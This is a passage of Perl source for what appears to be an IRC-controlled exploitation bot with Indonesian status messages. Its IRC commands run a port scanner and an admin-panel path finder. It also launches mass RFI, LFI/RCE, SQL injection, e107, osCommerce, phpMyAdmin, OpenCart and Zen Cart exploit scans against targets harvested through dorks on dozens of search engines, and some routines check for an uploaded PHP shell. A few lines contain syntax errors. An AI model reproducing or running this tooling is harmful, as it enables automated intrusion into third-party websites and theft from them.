479. &msg("$path","15(7@2IP15)12 IP Address : ".$ip." 10 ( ".$ipaddress." )");
480. &msg("$path","15(7@2IP15)12 City : ".$ip." 10 ( ".$city." )");
481. &msg("$path","15(7@2IP15)12 Country : ".$ip." 10 ( ".$country." )");
482. &msg("$path","15(7@2IP15)12 Continent : ".$ip." 10 ( ".$continent." )");
483. }
484. else {
485. &msg("$path","15(7@2IP15)13 ".$ip." 4not found in database");
486. }
487. }
488. else {
489. &msg("$path","15(7@2IP15)4 Cannot open IP database.");
490. }
491. }
492. exit;
493. }
494. }
495.  
496. if ($msg=~ /^!base64 (.*)$/ ) {
497. if (my $pid = fork) { waitpid($pid, 0); } else {
498. if (fork) { exit; } else {
499. my $hash = $1;
500. my $base64_encoded = encode_base64($hash);
501. my $base64_decoded = decode_base64($hash);
502. &msg("$path","15(7@2BASE6415)13 Decode : 2$base64_decoded");
503. &msg("$path","15(7@2BASE6415)13 Encode : 2$base64_encoded");
504. }
505. exit;
506. }
507. }
508.  
509. if ($msg =~ /^!portscan (.*)$/ ) {
510. my $hostip="$1";
511. my @portas= ("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139 ","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","78 3","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5 222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","3131 0","33133","33733","55555");
512. my (@aberta, %porta_banner);
513. &msg("$path","15(7@2PORTSCAN15) 10Loading port scanner.");
514. foreach my $porta (@portas) {
515. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
516. if ($scansock) {
517. push (@aberta, $porta);
518. $scansock->close;
519. }
520. }
521.  
522. if (@aberta) {
523. &msg("$path", "15(7@2portscan15)12 open ports are...:10 @aberta");
524. } else {
525. &msg("$path","15(7@2portscan15)12 all ports are closed");
526. }
527. }
528.  
529. if ($msg=~ /^!login (.*)$/ ) {
530. if (my $pid = fork) { waitpid($pid, 0); } else {
531. if (fork) { exit; } else {
532. my $test = $1 ;
533. @index = ('/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/home.php','/admin/controlpanel.html','/admin/controlpane l.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/login.ht ml','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html','/contr olpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp- admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp- login/','/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/home.php','/admin/controlpanel.html','/admin/cont rolpanel.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/l ogin.html','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html', '/controlpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp- admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp- login/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel- administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php' ,'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login. html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb- admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp /index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_l ogin.html','panel- administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.ph p','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
534. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
535. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
536. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
537. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
538. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/lo gin.html','adminarea/login.html','panel-administracion/index.html','panel- administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','a ccount.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp- login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel- administracion/index.php','panel- administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login .php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin1.php','admin1.html','admin2.php','a dmin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','ccms/','ccms/login.php','ccms/index.php','maintenance/','webmaster/','adm/','configuration/',' configure/','websvn/','admin/','admin/account.php','admin/account.html'. 'admin/index.php','admin/index.html','admin/login.php'. 'admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','admi nistrator/','administrator/index.html','administrator/index.php','administrator/login.html','administrator/login.php','administrator/account.html','administrator/accou nt.php','administrator.php','administrator.html','login.php','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/log in.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.ph p','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/index.asp','admin/login.asp ','admin/home.asp','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','admini strator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','admin panel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration/','administration.php','administration.html','sysadmin.php','sysadmin.html','p hpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp- admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins. php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system- administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys- admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallo gin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir- login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project- admins/','phppgadmin/','pureadmin/','sql- admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/ ','Indy_admin/','ccp14admin/','irc- macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super- Admin/','dminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_a dministration/','power_user/','system_administration/','ss_vms_admin_sm/',' --> Finish!!');
539. &msg("$path","11,1(4@9LOGIN11,1)3 Searching Admin login for 4".$test."");
540. foreach $scan(@index){
541. $url = $test.$scan;
542. $request = HTTP::Request->new(GET=>$url);
543. $useragent = LWP::UserAgent->new();
544. $response = $useragent->request($request);
545. if ($response->is_success && $response->content =~ /Admin Area/ || $response->content =~ /Password/ || $response->content =~ /welcome/ || $response->content =~ /admin area/ || $response->content =~ /passwd/ || $response->content =~ /username/) {
546. $msg = "9Ok!!";
547. }
548. else { $msg = "4forbidden!!";}
549. &msg("$path","11,1(4@9LOGIN11,1)3 $url 4$msg");
550. sleep 1;
551. }
552. }
553. exit;
554. }
555. }
556.  
557. ##################################################################### RFI SCAN
558.  
559. if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
560. if (my $pid = fork) {
561. waitpid($pid, 0);
562. }
563. else {
564. if (fork) { exit; } else {
565. my ($bug,$dork) = ($1,$2);
566. &msg("$path","$rfilogo 12Dork :4 $dork");
567. &msg("$path","$rfilogo 12Bugz :4 $bug");
568. &msg("$path","$rfilogo 4$nickname 8Memulai Ekksploitasi...");
569. &scan_start($path,$bug,$dork,$engine,14);
570. }
571. exit;
572. }
573. }
574. ##################################################################### DOMRFI
575. if (&isAdmin($nick) && $msg=~ /^!domrfi\s+(.*?)\s+(.*)/ ) {
576. if (my $pid = fork) {
577. waitpid($pid, 0);
578. }
579. else {
580. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
581. if (fork) { exit; } else {
582.  
583. my ($bug,$dork) = ($1,$2." ".$domens);
584. &msg("$path","$rfilogo 12Dork :4 $dork");
585. &msg("$path","$rfilogo 12Bugz :4 $bug");
586. &msg("$path","$rfilogo 4$nickname 8Memulai Eksploitasi...");
587. &scan_start($path,$bug,$dork,$engine,14);
588. }
589. exit;
590. }
591. }
592. }
593.  
594.  
595. ##################################################################### LFIRCE SCAN
596.  
597. if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
598. if (my $pid = fork) {
599. waitpid($pid, 0);
600. }
601. else {
602. if (fork) { exit; } else {
603.  
604. my ($bug,$dork) = ($1,$2);
605. &msg("$path","$lfilogo 12Dork :4 $dork");
606. &msg("$path","$lfilogo 12Bugz :4 $bug");
607. &msg("$path","$lfilogo 4$nickname 8Memulai Eksploitasi...");
608. &scan_start($path,$bug,$dork,$engine,15);
609.  
610. }
611. exit;
612. }
613. }
614. ##################################################################### DOMLFI
615. if (&isAdmin($nick) && $msg=~ /^!domlfi\s+(.*?)\s+(.*)/ ) {
616. if (my $pid = fork) {
617. waitpid($pid, 0);
618. }
619. else {
620. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
621. if (fork) { exit; } else {
622.  
623. my ($bug,$dork) = ($1,$2." ".$domens);
624. &msg("$path","$lfilogo 12Dork :4 $dork");
625. &msg("$path","$lfilogo 12Bugz :4 $bug");
626. &msg("$path","$lfilogo 4$nickname 8Memulai Eksploitasi...");
627. &scan_start($path,$bug,$dork,$engine,15);
628. }
629. exit;
630. }
631. }
632. }
633.  
634. ##################################################################### e107 contact.php SCAN
635.  
636. if ($msg=~ /^$e107cmd\s+(.*)/) {
637. if (my $pid = fork) {
638. waitpid($pid, 0);
639. }
640. else {
641. if (fork) { exit; } else {
642.  
643. my ($bug,$dork) = ("contact.php",$1);
644. &msg("$path","$e107logo 12Dork :4 $dork");
645. &msg("$path","$e107logo 12Bugz :4 $bug");
646. &msg("$path","$e107logo 4$nickname 8Memulai Eksploitasi...");
647. &scan_start($path,$bug,$dork,$engine,3);
648.  
649. }
650. exit;
651. }
652. }
653. ##################################################################### DOME107
654. if (&isAdmin($nick) && $msg=~ /^!dome107\s+(.*)/ ) {
655. if (my $pid = fork) {
656. waitpid($pid, 0);
657. }
658. else {
659. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
660. if (fork) { exit; } else {
661.  
662. my ($bug,$dork) = ("contact.php",$1." ".$domens);
663. &msg("$path","$e107logo 12Dork :4 $dork");
664. &msg("$path","$e107logo 12Bugz :4 $bug");
665. &msg("$path","$e107logo 4$nickname 4$nickname 8Memulai Eksploitasi...");
666. &scan_start($path,$bug,$dork,$engine,3);
667. }
668. exit;
669. }
670. }
671. }
672.  
673. ##################################################################### XML SCAN
674. if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
675. if (my $pid = fork) {
676. waitpid($pid, 0);
677. }
678. else {
679. if (fork) { exit; } else {
680.  
681. my ($bug,$dork) = ($1,$2);
682. &msg("$path","$xmllogo 12Dork :4 $dork");
683. &msg("$path","$xmllogo 12Bugz :4 $bug");
684. &msg("$path","$xmllogo 4$nickname 8Memulai Eksploitasi...");
685. &scan_start($path,$bug,$dork,$engine,4);
686.  
687. }
688. exit;
689. }
690. }
691. ##################################################################### DOMXML
692. if (&isAdmin($nick) && $msg=~ /^!domxml\s+(.*?)\s+(.*)/ ) {
693. if (my $pid = fork) {
694. waitpid($pid, 0);
695. }
696. else {
697. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
698. if (fork) { exit; } else {
699.  
700. my ($bug,$dork) = ($1,$2." ".$domens);
701. &msg("$path","$xmllogo 12Dork :4 $dork");
702. &msg("$path","$xmllogo 12Bugz :4 $bug");
703. &msg("$path","$xmllogo 8Memulai Eksploitasi...");
704. &scan_start($path,$bug,$dork,$engine,4);
705. }
706. exit;
707. }
708. }
709. }
710.  
711. ##################################################################### SQL SCAN
712.  
713. if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
714. if (my $pid = fork) {
715. waitpid($pid, 0);
716. }
717. else {
718. if (fork) { exit; } else {
719. my ($bug,$dork) = ($1,$2);
720. &msg("$path","$sqllogo 12Dork :4 $dork");
721. &msg("$path","$sqllogo 12Bugz :4 $bug");
722. &msg("$path","$sqllogo 4$nickname 8Memulai Eksploitasi...");
723. &scan_start($path,$bug,$dork,$engine,5);
724. }
725. exit;
726. }
727. }
728.  
729. ##################################################################### OSCO SCAN
730.  
731. if ($msg=~ /^$oscocmd\s+(.*)/) {
732. if (my $pid = fork) {
733. waitpid($pid, 0);
734. }
735. else {
736. if (fork) { exit; } else {
737. if (&isFound($injector,"Rei Area")) {
738. my ($bug,$dork) = ("admin/categories.php/login.php",$1);
739. &msg("$path","$oscologo 12Dork :4 .::Path Hidden::.");
740. &scan_start($path,$bug,$dork,$engine,6);
741. } else {
742. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
743. }
744. }
745. exit;
746. }
747. }
748. #####################################################################
749. if ($msg=~ /^$oscoauto\s+(.*)/) {
750. if (my $pid = fork) {
751. waitpid($pid, 0);
752. }
753. else {
754. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
755. if (fork) { exit; } else {
756.  
757. my ($bug,$dork) = ("admin/categories.php/login.php",$1." ".$domens);
758. &msg("$path","$oscologo 12Dork :4 $dork");
759. &msg("$path","$oscologo 4$nickname 8Memulai Eksploitasi...");
760. &scan_start($path,$bug,$dork,$engine,6);
761. }
762. exit;
763. }
764. }
765. }
766. ##################################################################### OSCO2 SCAN
767.  
768. if ($msg=~ /^$oscocmd\s+(.*)/) {
769. if (my $pid = fork) {
770. waitpid($pid, 0);
771. }
772. else {
773. if (fork) { exit; } else {
774. if (&isFound($injector,"Rei Area")) {
775. my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
776. &msg("$path","$oscologo 12Dork :4 .::Path Hidden::.");
777. &scan_start($path,$bug,$dork,$engine,12);
778. } else {
779. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
780. }
781. }
782. exit;
783. }
784. }
785. #####################################################################
786. if ($msg=~ /^$oscoauto\s+(.*)/) {
787. if (my $pid = fork) {
788. waitpid($pid, 0);
789. }
790. else {
791. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
792. if (fork) { exit; } else {
793.  
794. my ($bug,$dork) = ("admin/file_manager.php/login.php",$1." ".$domens);
795. &scan_start($path,$bug,$dork,$engine,12);
796. }
797. exit;
798. }
799. }
800. }
801. ##################################################################### OSCOSQL SCAN
802.  
803. if ($msg=~ /^$ossqlcmd\s+(.+?)\s+(.*)/) {
804. if (my $pid = fork) {
805. waitpid($pid, 0);
806. }
807. else {
808. if (fork) { exit; } else {
809. my ($bug,$dork) = ($1,$2);
810. &msg("$path","$ossqllogo 12Dork :4 $dork");
811. &msg("$path","$ossqllogo 12Bugz :4 $bug");
812. &msg("$path","$ossqllogo 4$nickname 8Memulai Eksploitasi...");
813. &scan_start($path,$bug,$dork,$engine,10);
814. }
815. exit;
816. }
817. }
818.  
819. ##################################################################### OSCO3 SCAN
820.  
821. if ($msg=~ /^$oscocmd\s+(.*)/) {
822. if (my $pid = fork) {
823. waitpid($pid, 0);
824. }
825. else {
826. if (fork) { exit; } else {
827. if (&isFound($injector,"Rei Area")) {
828. my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1);
829. &msg("$path","$oscologo 12Dork :4 .::Path Hidden::.");
830. &msg("$path","$oscologo 4$nickname 8Memulai Eksploitasi...");
831. &scan_start($path,$bug,$dork,$engine,11);
832. } else {
833. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
834. }
835. }
836. exit;
837. }
838. }
839. #####################################################################
840. if ($msg=~ /^$oscoauto\s+(.*)/) {
841. if (my $pid = fork) {
842. waitpid($pid, 0);
843. }
844. else {
845. foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
846. if (fork) { exit; } else {
847.  
848. my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1." ".$domens);
849. &msg("$path","$oscologo 12Dork :4 $dork");
850. &msg("$path","$oscologo 4$nickname 8Memulai Eksploitasi...");
851. &scan_start($path,$bug,$dork,$engine,11);
852. }
853. exit;
854. }
855. }
856. }
857. ##################################################################### E107SQL SCAN
858.  
859. if ($msg=~ /^$esqlcmd\s+(.*)/) {
860. if (my $pid = fork) {
861. waitpid($pid, 0);
862. }
863. else {
864. if (fork) { exit; } else {
865. my ($bug,$dork) = ("contact.php",$1);
866. &msg("$path","$e107logosql 12Dork :4 $dork")
867. &msg("$path","$e107logosql 3$nickname 8Memulai Eksploitasi...");
868. &scan_start($path,$bug,$dork,$engine,13);
869. }
870. exit;
871. }
872. }
873. ##################################################################### PhpMyAdmin SCAN
874.  
875. if ($msg=~ /^$admcmd\s+(.*)/) {
876. if (my $pid = fork) {
877. waitpid($pid, 0);
878. }
879. else {
880. if (fork) { exit; } else {
881. my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
882. &msg("$path","$admlogo 12Dork :4 $dork");
883. &msg("$path","$admlogo 4$nickname 8Mesum Dolo Ahh ...");
884. &scan_start($path,$bug,$dork,$engine,7);
885. }
886. exit;
887. }
888. }
889. ##################################################################### OPENCART SCAN
890.  
891. if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
892. if (my $pid = fork) {
893. waitpid($pid, 0);
894. }
895. else {
896. if (fork) { exit; } else {
897. my ($bug,$dork) = ($1,$2);
898. &msg("$path","$oplogo 12Dork :4 $dork");
899. &msg("$path","$oplogo 12Bugz :4 $bug");
900. &msg("$path","$oplogo 4$nickname 8Mesum Dolo Ahh ...");
901. &scan_start($path,$bug,$dork,$engine,8);
902. }
903. exit;
904. }
905. }
906. ##################################################################### ZEN SCAN
907.  
908. if ($msg=~ /^$zencmd\s+(.*)/) {
909. if (my $pid = fork) {
910. waitpid($pid, 0);
911. }
912. else {
913. if (fork) { exit; } else {
914. my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
915. &msg("$path","$zenlogo 12Dork :4 $dork");
916. &msg("$path","$zenlogo 3$nickname 8Memulai Eksploitasi...");
917. &scan_start($path,$bug,$dork,$engine,9);
918. }
919. exit;
920. }
921. }
922. ##################################################################### ZEN SCAN
923.  
924. if ($msg=~ /^$zencmd\s+(.*)/) {
925. if (my $pid = fork) {
926. waitpid($pid, 0);
927. }
928. else {
929. if (fork) { exit; } else {
930. my ($bug,$dork) = ("admin/record_company.php",$1);
931. &scan_start($path,$bug,$dork,$engine,9);
932. }
933. exit;
934. }
935. }
936. #####################################################################
937.  
938. }
939. }
940.  
941. for(my $c=0; $c<= $#lines; $c++) {
942. $line = $lines[$c];
943. $line = $line_temp.$line if ($line_temp);
944. $line_temp = '';
945. $line =~ s/\r$//;
946. unless ($c == $#lines) {
947. &parse("$line");
948. } else {
949. if ($#lines == 0) {
950. &parse("$line");
951. } elsif ($lines[$c] =~ /\r$/) {
952. &parse("$line");
953. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
954. &parse("$line");
955. } else {
956. $line_temp = $line;
957. }
958. }
959. }
960. }
961. }
962.  
963. #########################################
964. sub type () {
965. my ($chan,$bug,$dork,$engine,$type) = @_;
966. if ($type == 1){&thumb($chan,$bug,$dork,$engine);}
967. elsif ($type == 2){&zboard($chan,$bug,$dork,$engine);}
968. elsif ($type == 3){&e107($chan,$bug,$dork,$engine);}
969. elsif ($type == 4){&xml($chan,$bug,$dork,$engine);}
970. elsif ($type == 5){&sql($chan,$bug,$dork,$engine);}
971. elsif ($type == 6){&osco($chan,$bug,$dork,$engine);}
972. elsif ($type == 7){&adm($chan,$bug,$dork,$engine);}
973. elsif ($type == 8){&op($chan,$bug,$dork,$engine);}
974. elsif ($type == 9){&zen($chan,$bug,$dork,$engine);}
975. elsif ($type == 10){&oscoQ($chan,$bug,$dork,$engine);}
976. elsif ($type == 11){&osco3($chan,$bug,$dork,$engine);}
977. elsif ($type == 12){&osco2($chan,$bug,$dork,$engine);}
978. elsif ($type == 13){&se107Q($chan,$bug,$dork,$engine);}
979. elsif ($type == 14){&rfi($chan,$bug,$dork,$engine);}
980. elsif ($type == 15){&lfi($chan,$bug,$dork,$engine);}
981. }
982.  
983. sub scan_start() {
984. my ($chan,$bug,$dork,$engine,$type) = @_;
985. if ($engine =~ /google/i) {
986. if (my $pid = fork) { waitpid($pid, 0); }
987. else { if (fork) { exit; } else {
988. &type($chan,$bug,$dork,"GooGLe",$type);
989. } exit; }
990. }
991.  
992. if ($engine =~ /google2/i) {
993. if ($pid = fork) { waitpid($pid, 0); }
994. else { if (fork) { exit; } else {
995. &type($chan,$bug,$dork,"GooGle2",$type);
996. } exit; }
997. }
998.  
999. if ($engine =~ /bing/i) {
1000. if ($pid = fork) { waitpid($pid, 0); }
1001. else { if (fork) { exit; } else {
1002. &type($chan,$bug,$dork,"Bing",$type);
1003. } exit; }
1004. }
1005.  
1006. if ($engine =~ /altavista/i) {
1007. if ($pid = fork) { waitpid($pid, 0); }
1008. else { if (fork) { exit; } else {
1009. &type($chan,$bug,$dork,"ALtaViSTa",$type);
1010. } exit; }
1011. }
1012.  
1013. if ($engine =~ /ask/i) {
1014. if ($pid = fork) { waitpid($pid, 0); }
1015. else { if (fork) { exit; } else {
1016. &type($chan,$bug,$dork,"AsK",$type);
1017. } exit; }
1018. }
1019.  
1020. if ($engine =~ /uol/i) {
1021. if ($pid = fork) { waitpid($pid, 0); }
1022. else { if (fork) { exit; } else {
1023. &type($chan,$bug,$dork,"UoL",$type);
1024. } exit; }
1025. }
1026.  
1027. if ($engine =~ /yahoo/i) {
1028. if ($pid = fork) { waitpid($pid, 0); }
1029. else { if (fork) { exit; } else {
1030. &type($chan,$bug,$dork,"YahOo",$type);
1031. } exit; }
1032. }
1033.  
1034. if ($engine =~ /clusty/i) {
1035. if ($pid = fork) { waitpid($pid, 0); }
1036. else { if (fork) { exit; } else {
1037. &type($chan,$bug,$dork,"CluSty",$type);
1038. } exit; }
1039. }
1040.  
1041. if ($engine =~ /gutser/i) {
1042. if ($pid = fork) { waitpid($pid, 0); }
1043. else { if (fork) { exit; } else {
1044. &type($chan,$bug,$dork,"GutSer",$type);
1045. } exit; }
1046. }
1047.  
1048. if ($engine =~ /rediff/i) {
1049. if ($pid = fork) { waitpid($pid, 0); }
1050. else { if (fork) { exit; } else {
1051. &type($chan,$bug,$dork,"ReDiff",$type);
1052. } exit; }
1053. }
1054.  
1055. if ($engine =~ /virgilio/i) {
1056. if ($pid = fork) { waitpid($pid, 0); }
1057. else { if (fork) { exit; } else {
1058. &type($chan,$bug,$dork,"VirgiLio",$type);
1059. } exit; }
1060. }
1061.  
1062. if ($engine =~ /webde/i) {
1063. if ($pid = fork) { waitpid($pid, 0); }
1064. else { if (fork) { exit; } else {
1065. &type($chan,$bug,$dork,"WebDe",$type);
1066. } exit; }
1067. }
1068.  
1069. if ($engine =~ /exalead/i) {
1070. if ($pid = fork) { waitpid($pid, 0); }
1071. else { if (fork) { exit; } else {
1072. &type($chan,$bug,$dork,"ExaLead",$type);
1073. } exit; }
1074. }
1075.  
1076. if ($engine =~ /lycos/i) {
1077. if ($pid = fork) { waitpid($pid, 0); }
1078. else { if (fork) { exit; } else {
1079. &type($chan,$bug,$dork,"LyCos",$type);
1080. } exit; }
1081. }
1082.  
1083. if ($engine =~ /hotbot/i) {
1084. if ($pid = fork) { waitpid($pid, 0); }
1085. else { if (fork) { exit; } else {
1086. &type($chan,$bug,$dork,"HotBot",$type);
1087. } exit; }
1088. }
1089.  
1090. if ($engine =~ /aol/i) {
1091. if ($pid = fork) { waitpid($pid, 0); }
1092. else { if (fork) { exit; } else {
1093. &type($chan,$bug,$dork,"AoL",$type);
1094. } exit; }
1095. }
1096.  
1097. if ($engine =~ /sapo/i) {
1098. if ($pid = fork) { waitpid($pid, 0); }
1099. else { if (fork) { exit; } else {
1100. &type($chan,$bug,$dork,"SaPo",$type);
1101. } exit; }
1102. }
1103.  
1104. if ($engine =~ /duck/i) {
1105. if ($pid = fork) { waitpid($pid, 0); }
1106. else { if (fork) { exit; } else {
1107. &type($chan,$bug,$dork,"DuCk",$type);
1108. } exit; }
1109. }
1110.  
1111. if ($engine =~ /lygo/i) {
1112. if ($pid = fork) { waitpid($pid, 0); }
1113. else { if (fork) { exit; } else {
1114. &type($chan,$bug,$dork,"LyGo",$type);
1115. } exit; }
1116. }
1117.  
1118. if ($engine =~ /yause/i) {
1119. if ($pid = fork) { waitpid($pid, 0); }
1120. else { if (fork) { exit; } else {
1121. &type($chan,$bug,$dork,"YauSe",$type);
1122. } exit; }
1123. }
1124.  
1125. if ($engine =~ /baidu/i) {
1126. if ($pid = fork) { waitpid($pid, 0); }
1127. else { if (fork) { exit; } else {
1128. &type($chan,$bug,$dork,"BaiDu",$type);
1129. } exit; }
1130. }
1131.  
1132. if ($engine =~ /kipot/i) {
1133. if ($pid = fork) { waitpid($pid, 0); }
1134. else { if (fork) { exit; } else {
1135. &type($chan,$bug,$dork,"KiPoT",$type);
1136. } exit; }
1137. }
1138.  
1139. if ($engine =~ /gibla/i) {
1140. if ($pid = fork) { waitpid($pid, 0); }
1141. else { if (fork) { exit; } else {
1142. &type($chan,$bug,$dork,"GiBLa",$type);
1143. } exit; }
1144. }
1145.  
1146. if ($engine =~ /black/i) {
1147. if ($pid = fork) { waitpid($pid, 0); }
1148. else { if (fork) { exit; } else {
1149. &type($chan,$bug,$dork,"BLacK",$type);
1150. } exit; }
1151. }
1152.  
1153. if ($engine =~ /onet/i) {
1154. if ($pid = fork) { waitpid($pid, 0); }
1155. else { if (fork) { exit; } else {
1156. &type($chan,$bug,$dork,"oNeT",$type);
1157. } exit; }
1158. }
1159.  
1160. if ($engine =~ /sizuka/i) {
1161. if ($pid = fork) { waitpid($pid, 0); }
1162. else { if (fork) { exit; } else {
1163. &type($chan,$bug,$dork,"SiZuka",$type);
1164. } exit; }
1165. }
1166.  
1167. if ($engine =~ /walla/i) {
1168. if ($pid = fork) { waitpid($pid, 0); }
1169. else { if (fork) { exit; } else {
1170. &type($chan,$bug,$dork,"WaLLa",$type);
1171. } exit; }
1172. }
1173.  
1174. if ($engine =~ /demos/i) {
1175. if ($pid = fork) { waitpid($pid, 0); }
1176. else { if (fork) { exit; } else {
1177. &type($chan,$bug,$dork,"DeMos",$type);
1178. } exit; }
1179. }
1180.  
1181. if ($engine =~ /rose/i) {
1182. if ($pid = fork) { waitpid($pid, 0); }
1183. else { if (fork) { exit; } else {
1184. &type($chan,$bug,$dork,"RoSe",$type);
1185. } exit; }
1186. }
1187.  
1188. if ($engine =~ /seznam/i) {
1189. if ($pid = fork) { waitpid($pid, 0); }
1190. else { if (fork) { exit; } else {
1191. &type($chan,$bug,$dork,"SeZnaM",$type);
1192. } exit; }
1193. }
1194.  
1195. if ($engine =~ /tiscali/i) {
1196. if ($pid = fork) { waitpid($pid, 0); }
1197. else { if (fork) { exit; } else {
1198. &type($chan,$bug,$dork,"TisCali",$type);
1199. } exit; }
1200. }
1201.  
1202. if ($engine =~ /naver/i) {
